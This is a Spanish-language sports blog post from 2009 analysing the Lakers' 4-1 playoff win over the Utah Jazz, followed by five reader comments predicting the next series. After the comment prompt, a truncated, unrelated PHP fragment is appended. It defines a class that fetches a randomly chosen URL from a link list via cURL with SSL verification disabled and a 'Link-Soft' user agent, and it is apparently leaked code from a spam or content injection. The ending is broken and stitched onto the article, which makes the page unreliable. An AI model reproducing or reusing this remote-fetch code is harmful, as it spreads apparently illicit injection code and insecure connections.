Lakers 4 – Jazz 1: La ley del mínimo esfuerzo

28 de April de 2009 por TheDeerHunter

Otro pronóstico que clavamos. 2 de 2 por el momento y el análisis previo muy ajustado. En cierto modo era un resultado bastante previsible y las circunstancias de ambos equipos bastante evidentes. Otra eliminatoria que ha sido fiel reflejo de la trayectoria de ambos durante la regular.

En los Lakers, poco o nada les ha cambiado la vida al llegar a postemporada. Mismas virtudes y defectos al rebufo de los Cavs por lo que sigue quedando un poso negativo en el magnífico resultado. Vaivenes de concentración indiscutibles y juego a rachas contra un rival que apenas les ha exigido defensivamente. No podrán negar que sólo se les ha visto apretar los dientes en momentos puntuales en los que se han visto amenazados, superando los problemas con tanta facilidad que quedan en evidencia. El mínimo esfuerzo y el aburrimiento nunca fue el camino del campeón.

En el aspectos positivos, podemos destacar la rapidez con la que han cerrado la eliminatoria y el aparente nulo desgaste que han sufrido (sin contar la lesión de Walton, fortuita a todas luces). La ¿temporal? recuperación de Odom es un factor bestial si lo mantienen caliente estos días de descanso pero por el contrario, Andrew Bynum no ha salido demasiado bien parado de un enfrentamiento donde era una baza la mayor movilidad del ex-alero de los Heat. De todas maneras estamos convencidos que su papel será muy util en los próximos cruces, como mínimo más que los de Turiaf y Mihm en el pasado.

Por los Jazz, pensar que podrían superar siquiera los 105 puntos de anotación que han mantenido sin despeinarse Lakers era poco menos que ciencia ficción. Sólo en el único partido que mordieron en defensa lograron la victoria prácticamente de milagro (que ya es milagro que Boozer haya mantenido el nivel toda la serie). Desconocidos en defensa, en ambición… y en general bastante decepcionantes.

Decepcionante termina la era Boozer en Utah. En medio de casi cómicas comparaciones con Karl Malone, nadie llorará su marcha. Ahora toca renovar a Millsap por lo más próximo a lo que se merece… que si lo comparamos con Kirilenko debería de ser mucho. El pastizal que cobra el ruso es para tirarse de los pelos y difícilmente podrán aspirar a nada mientras no hayan resuelto ese contrato. Harto difícil que consigan encasquetárselo a algún incauto con los tiempos que corren.

Con lo puesto y alrededor de Deron Williams podrán seguir aspirando a la postemporada y poco más, a no ser que Sloan sea capaz de sacar algún conejo blanco de la chistera.

Pregunta al canto: ¿qué equipo cantaría mejor aquello de Beat L.A.? ¿Houston o Portland?

Comenta

5 comentarios a esta entrada

  1. Wookie dice:
    #1

    Para mi resultan un riesgo mayor Houston para los amarillos, Yao puede hacer bastante daño dentro, sobre todo si Bynum se ha ido para no volver. Artest sobremotivará a Kobe… y eso tiene solo dos finales: o que se las tire casi todas y se haga el héroe, o que se las tire todas, y pierdan el partido.

    En caso de Houston propongo un 4-2 a favor de Lakers.

    Partidazo el Celtics – Bulls, Perkins todavia se está creyendo lo que ha hecho…

    Un saludo máquinas!

      Citar

  2. Txusma dice:
    #2

    Entiendo q contra Houston, Bynum disfrutara de bastantes mas minutos q contra Utah. Aunq sea para cansar a Yao!! Ni Houston ni Portland ganan mas de un partido a los Lakers.

      Citar

  3. David dice:
    #3

    Eso si Bynum no tiene problemas de faltas, que contra Yao tampoco confío mucho en ello

      Citar

  4. J. Abraham dice:
    #4

    los laker pueden barrer a houston o a porlant ninguno es rival estos tienen buena ofensiva Kobe puede o encenderse mas y aumentar sus rachaz o pasar el balon oportunamente a resto del equipo

      Citar

  5. MagicJohnson32 dice:
    #5

    Bynum será titular durante la eliminatoria contra los Rockets o los Blazers, no tengáis duda. El ajuste de Phil Jackson fue lógico y se debió a motivos tácticos. Ahora, ante pívots puros (sea Yao o sean los de los Blazers), a Phil no le queda otra que volver a la opción Bynum.

    Por cierto, la eliminatoria, sea contra quien sea, empezará el próximo lunes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>